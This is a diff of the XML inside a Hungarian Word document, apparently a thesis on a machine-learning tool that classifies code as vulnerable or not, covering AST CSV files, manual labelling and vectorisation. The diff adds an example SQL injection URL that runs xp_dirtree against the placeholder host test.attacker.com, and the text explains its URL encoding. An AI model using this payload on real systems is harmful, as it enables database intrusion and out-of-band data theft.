-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dekódoláskor a </w:t>
-      </w:r>
+        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%20</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és a </w:t>
+        <w:t>xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dekódoláskor a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7097,13 +7143,13 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%5c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
+        <w:t>%20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7111,27 +7157,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>%5c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>..</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -16749,13 +16811,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mappában helyezked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ik el</w:t>
+        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16788,6 +16844,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -16921,13 +16978,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
+        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17012,31 +17063,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>irodalomjegyzék [1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>] elem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e segítségével</w:t>
+        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17202,6 +17229,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -17528,13 +17556,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(„</w:t>
+        <w:t xml:space="preserve"> („</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -17733,6 +17755,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -17791,13 +17814,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17857,14 +17874,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>pdo1_as</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>t.csv</w:t>
+        <w:t>pdo1_ast.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17987,112 +17997,357 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>concatenate.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> által</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>concatenate</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d.csv fájlba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, majd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">manuálisan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felcímkézem őket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nnak duplikáltjában, a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenate</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d_title</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> által</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, majd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">manuálisan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>felcímkézem őket, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>csv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18104,19 +18359,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
+        <w:t xml:space="preserve">kézett </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18130,110 +18373,49 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>vectorizer</w:t>
+        <w:t>tanulo_adatok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>\</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>concatenated</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>_titled</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated.csv</w:t>
+        <w:t>.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18970,13 +19152,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">formában </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kerülnek be a szavak</w:t>
+        <w:t>formában kerülnek be a szavak</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19147,6 +19323,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
       </w:r>
       <w:r>
@@ -19183,19 +19360,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.oszlopának</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bináris számain is, amiket pedig az </w:t>
+        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19231,9 +19396,9 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
             <wp:extent cx="3784795" cy="1892397"/>
@@ -19322,27 +19487,29 @@
         </w:rPr>
         <w:t xml:space="preserve">z </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">X[40] </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és a</w:t>
-      </w:r>
+        <w:t>X[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z </w:t>
+        <w:t xml:space="preserve">40] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19350,7 +19517,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>y</w:t>
+        <w:t xml:space="preserve">z </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19358,7 +19525,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>[40</w:t>
+        <w:t>y[40</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19498,7 +19665,21 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenated.csv</w:t>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>_titled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19581,7 +19762,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> változókat lementi egy-egy .</w:t>
+        <w:t xml:space="preserve"> változókat lementi egy-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -19591,6 +19779,7 @@
         <w:t>npy</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19607,6 +19796,120 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\cevtorizer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tehát két</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>olyan .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>npy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlt hoz létre, amit később </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
